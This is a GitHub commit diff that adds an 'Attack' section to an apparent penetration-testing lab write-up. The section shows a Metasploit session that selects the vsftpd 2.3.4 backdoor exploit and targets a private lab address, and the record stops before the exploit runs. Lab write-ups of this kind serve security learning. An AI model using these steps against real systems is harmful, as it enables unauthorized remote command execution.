-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
49 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -24,3 +24,52 @@ PORT STATE SERVICE VERSION | |
8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ||
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | ||
``` | ||
## Attack | ||
``` | ||
└─$ msfconsole -q | ||
msf6 > search vsftpd | ||
Matching Modules | ||
================ | ||
# Name Disclosure Date Rank Check Description | ||
- ---- --------------- ---- ----- ----------- | ||
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service | ||
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution | ||
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor | ||
msf6 > use 1 | ||
[*] No payload configured, defaulting to cmd/unix/interact | ||
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101 | ||
RHOSTS => 192.168.56.101 | ||
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info | ||
Name: VSFTPD v2.3.4 Backdoor Command Execution | ||
Module: exploit/unix/ftp/vsftpd_234_backdoor | ||
Platform: Unix | ||
Arch: cmd | ||
Privileged: Yes | ||
License: Metasploit Framework License (BSD) | ||
Rank: Excellent | ||
Disclosed: 2011-07-03 | ||
Provided by: | ||
hdm <[email protected]> | ||
MC <[email protected]> | ||
Available targets: | ||
Id Name | ||
-- ---- | ||
=> 0 Automatic | ||
Check supported: | ||
No | ||
Basic options: | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
RHOSTS 192.168.56.101 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html | ||
RPORT 21 yes The target port (TCP) | ||
``` |